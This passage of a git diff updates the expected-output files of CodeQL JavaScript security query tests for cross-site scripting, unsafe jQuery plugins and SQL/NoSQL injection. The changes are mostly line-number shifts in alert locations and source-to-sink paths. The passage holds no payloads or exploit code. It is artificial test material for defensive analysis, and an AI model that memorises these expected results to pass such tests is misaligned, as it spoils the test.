ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected index d29b35203b80..eae50c0243f9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected @@ -1,25 +1,25 @@ -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected index f246b00d7878..b17ab0564834 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected @@ -169,17 +169,17 @@ subpaths | unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... ml);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | '$.fn.affix' plugin | -| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | '$.fn.tooltip' plugin | -| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... NCY]\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... ert\\n\\t\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... lert\\n\\t} | '$.fn.affix' plugin | +| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... lert\\n\\t} | '$.fn.tooltip' plugin | +| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... ties\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected index 0f95e5464fb9..52ce3076ba70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected @@ -1,4 +1,4 @@ -| html-sanitizer.js:15:5:17:5 | connect ... K\\n ) | +| html-sanitizer.js:15:5:17:5 | connect ... t\\n ) | | json-schema-validator.js:27:13:27:27 | doc.find(query) | | json-schema-validator.js:30:13:30:27 | doc.find(query) | | json-schema-validator.js:33:13:33:27 | doc.find(query) | @@ -7,43 +7,43 @@ | json-schema-validator.js:55:13:55:27 | doc.find(query) | | json-schema-validator.js:59:13:59:27 | doc.find(query) | | json-schema-validator.js:61:13:61:27 | doc.find(query) | -| marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | -| marsdb.js:16:3:16:36 | doc.fin ... => {}) | -| minimongo.js:18:3:18:17 | doc.find(query) | -| mongodb.js:18:7:18:21 | doc.find(query) | -| mongodb.js:21:7:21:48 | doc.fin ... itle }) | -| mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | -| mongodb.js:29:9:29:34 | doc.fin ... itle }) | -| mongodb.js:32:9:32:46 | doc.fin ... tle) }) | -| mongodb.js:43:7:43:21 | doc.find(query) | -| mongodb.js:54:7:54:21 | doc.find(query) | -| mongodb.js:65:3:65:17 | doc.find(query) | -| mongodb.js:73:5:77:27 | client\\n ... tag }) | -| mongodb.js:81:3:85:25 | importe ... tag }) | -| mongodb.js:98:5:98:19 | doc.find(query) | -| mongodb.js:112:5:112:19 | doc.find(query) | +| marsdb-flow-to.js:13:3:13:41 | db.myDo ... => {}) | +| marsdb.js:15:3:15:36 | doc.fin ... => {}) | +| minimongo.js:17:3:17:17 | doc.find(query) | +| mongodb.js:17:7:17:21 | doc.find(query) | +| mongodb.js:20:7:20:48 | doc.fin ... itle }) | +| mongodb.js:23:7:23:53 | doc.fin ... r(1) }) | +| mongodb.js:28:9:28:34 | doc.fin ... itle }) | +| mongodb.js:30:9:30:46 | doc.fin ... tle) }) | +| mongodb.js:41:7:41:21 | doc.find(query) | +| mongodb.js:51:7:51:21 | doc.find(query) | +| mongodb.js:61:3:61:17 | doc.find(query) | +| mongodb.js:69:5:72:27 | client\\n ... tag }) | +| mongodb.js:76:3:79:25 | importe ... tag }) | +| mongodb.js:92:5:92:19 | doc.find(query) | +| mongodb.js:105:5:105:19 | doc.find(query) | | mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | -| mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | -| mongoose.js:63:2:63:34 | Documen ... then(X) | -| mongoose.js:65:2:65:51 | Documen ... on(){}) | -| mongoose.js:67:2:68:27 | new Mon ... on(){}) | -| mongoose.js:71:2:78:9 | Documen ... .exec() | -| mongoose.js:85:2:85:52 | Documen ... query)) | -| mongoose.js:86:2:86:52 | Documen ... query)) | -| mongoose.js:87:2:87:57 | Documen ... query)) | -| mongoose.js:88:2:88:57 | Documen ... query)) | -| mongoose.js:89:2:89:52 | Documen ... query)) | -| mongoose.js:90:2:90:55 | Documen ... query)) | -| mongoose.js:92:2:92:52 | Documen ... query)) | -| mongoose.js:93:2:93:49 | Documen ... query)) | -| mongoose.js:94:2:94:57 | Documen ... query)) | -| mongoose.js:95:2:95:54 | Documen ... query)) | -| mongoose.js:96:2:96:52 | Documen ... query)) | -| mongoose.js:97:2:97:52 | Documen ... query)) | -| mongoose.js:99:2:99:50 | Documen ... query)) | -| mongoose.js:113:2:113:53 | Documen ... () { }) | -| mongoose.js:134:3:134:52 | Documen ... on(){}) | -| mongoose.js:136:3:136:52 | Documen ... on(){}) | +| mongodb_bodySafe.js:28:7:28:21 | doc.find(query) | +| mongoose.js:49:2:49:34 | Documen ... then(X) | +| mongoose.js:51:2:51:51 | Documen ... on(){}) | +| mongoose.js:53:2:54:27 | new Mon ... on(){}) | +| mongoose.js:57:2:64:9 | Documen ... .exec() | +| mongoose.js:71:2:71:52 | Documen ... query)) | +| mongoose.js:72:2:72:52 | Documen ... query)) | +| mongoose.js:73:2:73:57 | Documen ... query)) | +| mongoose.js:74:2:74:57 | Documen ... query)) | +| mongoose.js:75:2:75:52 | Documen ... query)) | +| mongoose.js:76:2:76:55 | Documen ... query)) | +| mongoose.js:78:2:78:52 | Documen ... query)) | +| mongoose.js:79:2:79:49 | Documen ... query)) | +| mongoose.js:80:2:80:57 | Documen ... query)) | +| mongoose.js:81:2:81:54 | Documen ... query)) | +| mongoose.js:82:2:82:52 | Documen ... query)) | +| mongoose.js:83:2:83:52 | Documen ... query)) | +| mongoose.js:85:2:85:50 | Documen ... query)) | +| mongoose.js:99:2:99:53 | Documen ... () { }) | +| mongoose.js:120:3:120:52 | Documen ... on(){}) | +| mongoose.js:122:3:122:52 | Documen ... on(){}) | | mysql.js:8:9:11:47 | connect ... ds) {}) | | mysql.js:14:9:16:47 | connect ... ds) {}) | | mysql.js:19:9:20:48 | connect ... ds) {}) | @@ -59,10 +59,10 @@ | pg-promise.js:17:3:17:21 | db.oneOrNone(query) | | pg-promise.js:18:3:18:17 | db.query(query) | | pg-promise.js:19:3:19:18 | db.result(query) | -| pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | -| pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | +| pg-promise.js:21:3:23:4 | db.one( ... rt\\n }) | +| pg-promise.js:24:3:27:4 | db.one( ... d,\\n }) | | pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | -| pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | +| pg-promise.js:32:3:35:4 | db.one( ... rt\\n }) | | pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | | pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | | pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | @@ -88,7 +88,7 @@ | redis.js:49:18:49:47 | client. ... value") | | socketio.js:11:5:11:54 | db.run( ... ndle}`) | | tst2.js:7:3:7:62 | sql.que ... ms.id}` | -| tst2.js:9:3:9:85 | new sql ... + "'") | +| tst2.js:8:3:8:85 | new sql ... + "'") | | tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | | tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | | tst4.js:8:3:8:67 | db.get( ... + '"') | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected index 5ae279288cf8..e19e6731ee75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected @@ -1,38 +1,38 @@ nodes | graphql.js:8:11:8:28 | id | semmle.label | id | | graphql.js:8:16:8:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | semmle.label | `\\n ... }\\n ` | -| graphql.js:12:46:12:47 | id | semmle.label | id | -| graphql.js:26:11:26:28 | id | semmle.label | id | -| graphql.js:26:16:26:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:27:30:27:40 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:27:37:27:38 | id | semmle.label | id | -| graphql.js:30:32:30:42 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:30:39:30:40 | id | semmle.label | id | -| 